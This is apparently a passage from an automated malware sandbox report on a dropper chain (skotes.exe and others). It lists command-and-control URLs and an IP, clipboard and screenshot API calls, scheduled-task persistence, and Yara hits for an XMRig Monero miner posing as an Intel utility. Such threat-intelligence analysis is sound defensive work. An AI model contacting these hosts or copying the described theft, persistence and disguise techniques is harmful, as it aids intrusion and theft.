                          Source: skotes.exe, 00000006.00000002.3384635500.00000000010FE000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3384635500.00000000010BB000.00000004.00000020.00020000.00000000.sdmp, 5639a58f3b.exe, 00000008.00000002.2963455814.000000000098E000.00000004.00000020.00020000.00000000.sdmp, 850609077b.exe, 0000000B.00000002.3026991513.0000000000D81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                          Source: skotes.exe, 00000006.00000002.3384635500.00000000010FE000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3384635500.00000000010BB000.00000004.00000020.00020000.00000000.sdmp, 5639a58f3b.exe, 00000008.00000002.2963455814.000000000098E000.00000004.00000020.00020000.00000000.sdmp, 850609077b.exe, 0000000B.00000002.3026991513.0000000000D81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
                          Source: skotes.exe, 00000006.00000002.3384635500.00000000010FE000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3384635500.00000000010BB000.00000004.00000020.00020000.00000000.sdmp, 5639a58f3b.exe, 00000008.00000002.2963455814.000000000098E000.00000004.00000020.00020000.00000000.sdmp, 850609077b.exe, 0000000B.00000002.3026991513.0000000000D81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                          Source: skotes.exe, 00000006.00000002.3384635500.00000000010FE000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3384635500.0000000001113000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3384635500.00000000010BB000.00000004.00000020.00020000.00000000.sdmp, 5639a58f3b.exe, 00000008.00000002.2963455814.000000000098E000.00000004.00000020.00020000.00000000.sdmp, 850609077b.exe, 0000000B.00000002.3026991513.0000000000D81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
                          Source: skotes.exe, 00000006.00000002.3384635500.00000000010FE000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3384635500.0000000001113000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3384635500.00000000010BB000.00000004.00000020.00020000.00000000.sdmp, 5639a58f3b.exe, 00000008.00000002.2963455814.000000000098E000.00000004.00000020.00020000.00000000.sdmp, 850609077b.exe, 0000000B.00000002.3026991513.0000000000D81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
                          Source: skotes.exe, 00000006.00000002.3384635500.00000000010FE000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3384635500.00000000010BB000.00000004.00000020.00020000.00000000.sdmp, 5639a58f3b.exe, 00000008.00000002.2963455814.000000000098E000.00000004.00000020.00020000.00000000.sdmp, 850609077b.exe, 0000000B.00000002.3026991513.0000000000D81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
                          Source: skotes.exe, 00000006.00000002.3384635500.00000000010FE000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3384635500.00000000010BB000.00000004.00000020.00020000.00000000.sdmp, 5639a58f3b.exe, 00000008.00000002.2963455814.000000000098E000.00000004.00000020.00020000.00000000.sdmp, 850609077b.exe, 0000000B.00000002.3026991513.0000000000D81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                          Source: skotes.exe, 00000006.00000002.3384635500.00000000010FE000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3384635500.0000000001113000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3384635500.00000000010BB000.00000004.00000020.00020000.00000000.sdmp, 5639a58f3b.exe, 00000008.00000002.2963455814.000000000098E000.00000004.00000020.00020000.00000000.sdmp, 850609077b.exe, 0000000B.00000002.3026991513.0000000000D81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
                          Source: skotes.exe, 00000006.00000002.3384635500.00000000010FE000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3384635500.0000000001113000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3384635500.00000000010BB000.00000004.00000020.00020000.00000000.sdmp, 5639a58f3b.exe, 00000008.00000002.2963455814.000000000098E000.00000004.00000020.00020000.00000000.sdmp, 850609077b.exe, 0000000B.00000002.3026991513.0000000000D81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
                          Source: skotes.exe, 00000006.00000002.3384635500.00000000010FE000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3384635500.00000000010BB000.00000004.00000020.00020000.00000000.sdmp, 5639a58f3b.exe, 00000008.00000002.2963455814.000000000098E000.00000004.00000020.00020000.00000000.sdmp, 850609077b.exe, 0000000B.00000002.3026991513.0000000000D81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                          Source: skotes.exe, 00000006.00000002.3384635500.00000000010FE000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3384635500.0000000001113000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3384635500.00000000010BB000.00000004.00000020.00020000.00000000.sdmp, 5639a58f3b.exe, 00000008.00000002.2963455814.000000000098E000.00000004.00000020.00020000.00000000.sdmp, 850609077b.exe, 0000000B.00000002.3026991513.0000000000D81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                          Source: 7c1324dac5.exe, 0000000E.00000000.3117032209.0000000000423000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://usbtor.ru/viewtopic.php?t=798)Z
                          Source: svchost.exe, 0000002B.00000002.3335720153.0000000002E3C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://198.251.84.107:9254/dc33e47f6acdb4eefe/ahbjmv76.0lxxe
                          Source: svchost.exe, 0000002B.00000002.3335720153.0000000002E3C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://198.251.84.107:9254/dc33e47f6acdb4eefe/ahbjmv76.0lxxex
                          Source: 5639a58f3b.exe, 0000000A.00000003.3208648876.0000000003879000.00000004.00000800.00020000.00000000.sdmp, 5639a58f3b.exe, 0000000A.00000003.3208546066.000000000387B000.00000004.00000800.00020000.00000000.sdmp, 850609077b.exe, 0000000D.00000003.3240472156.0000000003A98000.00000004.00000800.00020000.00000000.sdmp, 850609077b.exe, 0000000D.00000003.3240286170.0000000003A9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                          Source: 5639a58f3b.exe, 0000000A.00000003.3208648876.0000000003879000.00000004.00000800.00020000.00000000.sdmp, 5639a58f3b.exe, 0000000A.00000003.3208546066.000000000387B000.00000004.00000800.00020000.00000000.sdmp, 850609077b.exe, 0000000D.00000003.3240472156.0000000003A98000.00000004.00000800.00020000.00000000.sdmp, 850609077b.exe, 0000000D.00000003.3240286170.0000000003A9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                          Source: 5639a58f3b.exe, 0000000A.00000003.3208648876.0000000003879000.00000004.00000800.00020000.00000000.sdmp, 5639a58f3b.exe, 0000000A.00000003.3208546066.000000000387B000.00000004.00000800.00020000.00000000.sdmp, 850609077b.exe, 0000000D.00000003.3240472156.0000000003A98000.00000004.00000800.00020000.00000000.sdmp, 850609077b.exe, 0000000D.00000003.3240286170.0000000003A9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                          Source: 5639a58f3b.exe, 0000000A.00000003.3208648876.0000000003879000.00000004.00000800.00020000.00000000.sdmp, 5639a58f3b.exe, 0000000A.00000003.3208546066.000000000387B000.00000004.00000800.00020000.00000000.sdmp, 850609077b.exe, 0000000D.00000003.3240472156.0000000003A98000.00000004.00000800.00020000.00000000.sdmp, 850609077b.exe, 0000000D.00000003.3240286170.0000000003A9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                          Source: 5639a58f3b.exe, 0000000A.00000003.3208648876.0000000003879000.00000004.00000800.00020000.00000000.sdmp, 5639a58f3b.exe, 0000000A.00000003.3208546066.000000000387B000.00000004.00000800.00020000.00000000.sdmp, 850609077b.exe, 0000000D.00000003.3240472156.0000000003A98000.00000004.00000800.00020000.00000000.sdmp, 850609077b.exe, 0000000D.00000003.3240286170.0000000003A9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                          Source: 5639a58f3b.exe, 0000000A.00000003.3208648876.0000000003879000.00000004.00000800.00020000.00000000.sdmp, 5639a58f3b.exe, 0000000A.00000003.3208546066.000000000387B000.00000004.00000800.00020000.00000000.sdmp, 850609077b.exe, 0000000D.00000003.3240472156.0000000003A98000.00000004.00000800.00020000.00000000.sdmp, 850609077b.exe, 0000000D.00000003.3240286170.0000000003A9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                          Source: 5639a58f3b.exe, 0000000A.00000003.3208648876.0000000003879000.00000004.00000800.00020000.00000000.sdmp, 5639a58f3b.exe, 0000000A.00000003.3208546066.000000000387B000.00000004.00000800.00020000.00000000.sdmp, 850609077b.exe, 0000000D.00000003.3240472156.0000000003A98000.00000004.00000800.00020000.00000000.sdmp, 850609077b.exe, 0000000D.00000003.3240286170.0000000003A9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                          Source: 5639a58f3b.exe, 0000000A.00000002.3380643533.0000000000C72000.00000004.00000020.00020000.00000000.sdmp, 5639a58f3b.exe, 0000000A.00000003.3057320495.0000000000C99000.00000004.00000020.00020000.00000000.sdmp, 5639a58f3b.exe, 0000000A.00000002.3380643533.0000000000CFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat/
                          Source: 5639a58f3b.exe, 0000000A.00000002.3380643533.0000000000CFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat/9
                          Source: 5639a58f3b.exe, 0000000A.00000002.3380643533.0000000000D12000.00000004.00000020.00020000.00000000.sdmp, 5639a58f3b.exe, 0000000A.00000003.3057320495.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, 5639a58f3b.exe, 0000000A.00000003.3284814163.000000000383F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat/api
                          Source: 5639a58f3b.exe, 0000000A.00000003.3284814163.000000000383F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat/apigsK2
                          Source: 5639a58f3b.exe, 0000000A.00000002.3384196465.000000000383A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat/apiq
                          Source: 5639a58f3b.exe, 0000000A.00000002.3380643533.0000000000C99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat:443/api
                          Source: 850609077b.exe, 0000000D.00000002.3381728843.00000000012A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/
                          Source: 850609077b.exe, 0000000D.00000002.3381728843.00000000012A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click//
                          Source: 850609077b.exe, 0000000D.00000002.3381728843.00000000012A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/api
                          Source: 850609077b.exe, 0000000D.00000003.3359993193.0000000003A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/f
                          Source: 850609077b.exe, 0000000D.00000003.3360072814.0000000003A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/h
                          Source: 850609077b.exe, 0000000D.00000002.3381728843.000000000125A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click:443/api
                          Source: skotes.exe, 00000006.00000002.3384635500.00000000010FE000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3384635500.0000000001113000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3384635500.00000000010BB000.00000004.00000020.00020000.00000000.sdmp, 5639a58f3b.exe, 00000008.00000002.2963455814.000000000098E000.00000004.00000020.00020000.00000000.sdmp, 850609077b.exe, 0000000B.00000002.3026991513.0000000000D81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                          Source: 5639a58f3b.exe, 0000000A.00000003.3208648876.0000000003879000.00000004.00000800.00020000.00000000.sdmp, 5639a58f3b.exe, 0000000A.00000003.3208546066.000000000387B000.00000004.00000800.00020000.00000000.sdmp, 850609077b.exe, 0000000D.00000003.3240472156.0000000003A98000.00000004.00000800.00020000.00000000.sdmp, 850609077b.exe, 0000000D.00000003.3240286170.0000000003A9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                          Source: 5639a58f3b.exe, 0000000A.00000003.3208648876.0000000003879000.00000004.00000800.00020000.00000000.sdmp, 5639a58f3b.exe, 0000000A.00000003.3208546066.000000000387B000.00000004.00000800.00020000.00000000.sdmp, 850609077b.exe, 0000000D.00000003.3240472156.0000000003A98000.00000004.00000800.00020000.00000000.sdmp, 850609077b.exe, 0000000D.00000003.3240286170.0000000003A9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                          Source: Intel_PTT_EK_Recertification.exe, 00000024.00000003.3203826106.000002266CCD0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000025.00000002.3210301237.00000001402DD000.00000002.00000001.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/docs/algorithms
                          Source: Intel_PTT_EK_Recertification.exe, 00000024.00000003.3203826106.000002266CCD0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000025.00000002.3210301237.00000001402DD000.00000002.00000001.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/wizard
                          Source: Intel_PTT_EK_Recertification.exe, 00000024.00000003.3203826106.000002266CCD0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000025.00000002.3210301237.00000001402DD000.00000002.00000001.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/wizard%s
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
                          Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.6:49895 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.6:49913 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.6:49919 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.6:49929 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.6:49959 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.6:49971 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.6:49980 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.6:50000 version: TLS 1.2
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_00430F40 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,10_2_00430F40
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_00430F40 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,10_2_00430F40
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_004310F0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,10_2_004310F0
                          Source: 1459165c97.exe, 0000002A.00000003.3316994086.0000000005E30000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DirectInput8Creatememstr_90eac9a2-3
                          Source: 1459165c97.exe, 0000002A.00000003.3316994086.0000000005E30000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_809404f8-f
                          Source: Yara matchFile source: 43.3.svchost.exe.53d0000.6.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 42.3.1459165c97.exe.6050000.7.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 43.3.svchost.exe.53d0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 43.3.svchost.exe.55f0000.7.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 42.3.1459165c97.exe.5e30000.6.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 43.3.svchost.exe.53d0000.6.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 43.3.svchost.exe.55f0000.7.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000002B.00000003.3326988369.00000000055F0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002B.00000003.3324377603.00000000053D0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002A.00000003.3316994086.0000000005E30000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002A.00000003.3317173955.0000000006050000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 1459165c97.exe PID: 948, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6472, type: MEMORYSTR

                          System Summary

                          barindex
                          Malicious sample detected (through community Yara rule)
                          Source: 37.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                          Source: 37.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                          Source: 36.3.Intel_PTT_EK_Recertification.exe.2266ccd0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                          Source: 36.3.Intel_PTT_EK_Recertification.exe.2266ccd0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                          Source: 36.3.Intel_PTT_EK_Recertification.exe.2266ccd0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                          Source: 36.3.Intel_PTT_EK_Recertification.exe.2266ccd0000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                          Source: 00000024.00000003.3203826106.000002266CCD0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                          Source: 00000024.00000003.3203826106.000002266CCD0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects coinmining malware Author: ditekSHen
                          Drops password protected ZIP file
                          Source: file.bin.14.drZip Entry: encrypted
                          PE file contains section with special chars
                          Source: file.exeStatic PE information: section name:
                          Source: file.exeStatic PE information: section name: .idata
                          Source: skotes.exe.0.drStatic PE information: section name:
                          Source: skotes.exe.0.drStatic PE information: section name: .idata
                          Source: random[1].exe.6.drStatic PE information: section name:
                          Source: random[1].exe.6.drStatic PE information: section name: .idata
                          Source: random[1].exe.6.drStatic PE information: section name:
                          Source: 1459165c97.exe.6.drStatic PE information: section name:
                          Source: 1459165c97.exe.6.drStatic PE information: section name: .idata
                          Source: 1459165c97.exe.6.drStatic PE information: section name:
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_0062CB97 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,6_2_0062CB97
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF78BB0_2_00FF78BB
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF88600_2_00FF8860
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF70490_2_00FF7049
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF31A80_2_00FF31A8
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010C7B6E0_2_010C7B6E
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB4B300_2_00FB4B30
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB4DE00_2_00FB4DE0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF2D100_2_00FF2D10
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF779B0_2_00FF779B
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FE7F360_2_00FE7F36
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_006588602_2_00658860
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_006570492_2_00657049
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_006578BB2_2_006578BB
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_006531A82_2_006531A8
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00614B302_2_00614B30
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00652D102_2_00652D10
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00614DE02_2_00614DE0
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00647F362_2_00647F36
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_0065779B2_2_0065779B
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_006588603_2_00658860
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_006570493_2_00657049
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_006578BB3_2_006578BB
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_006531A83_2_006531A8
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00614B303_2_00614B30
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00652D103_2_00652D10
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00614DE03_2_00614DE0
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00647F363_2_00647F36
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_0065779B3_2_0065779B
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_0061E5306_2_0061E530
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_006361926_2_00636192
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_006588606_2_00658860
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00614B306_2_00614B30
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00652D106_2_00652D10
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00614DE06_2_00614DE0
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00630E136_2_00630E13
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_006570496_2_00657049
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_006531A86_2_006531A8
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_006316026_2_00631602
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_0065779B6_2_0065779B
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_006578BB6_2_006578BB
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00633DF16_2_00633DF1
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00647F366_2_00647F36
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 8_2_00D910008_2_00D91000
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 8_2_00D94C8C8_2_00D94C8C
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 8_2_00DA6F3A8_2_00DA6F3A
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_0041612410_2_00416124
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_004361F010_2_004361F0
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_004101FB10_2_004101FB
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_0041BC5010_2_0041BC50
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_0040972010_2_00409720
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_004087D010_2_004087D0
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_0043386710_2_00433867
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_0041681010_2_00416810
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_0043581010_2_00435810
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_0042F09010_2_0042F090
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_0043C0A010_2_0043C0A0
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_004280AA10_2_004280AA
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_0040395010_2_00403950
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_0043D15010_2_0043D150
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_0040596010_2_00405960
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_0041D16010_2_0041D160
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_0041D97010_2_0041D970
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_004291C310_2_004291C3
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_004351C010_2_004351C0
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_0042A1D010_2_0042A1D0
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_004229DD10_2_004229DD
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_004061E010_2_004061E0
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_004161FA10_2_004161FA
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_0043C1A010_2_0043C1A0
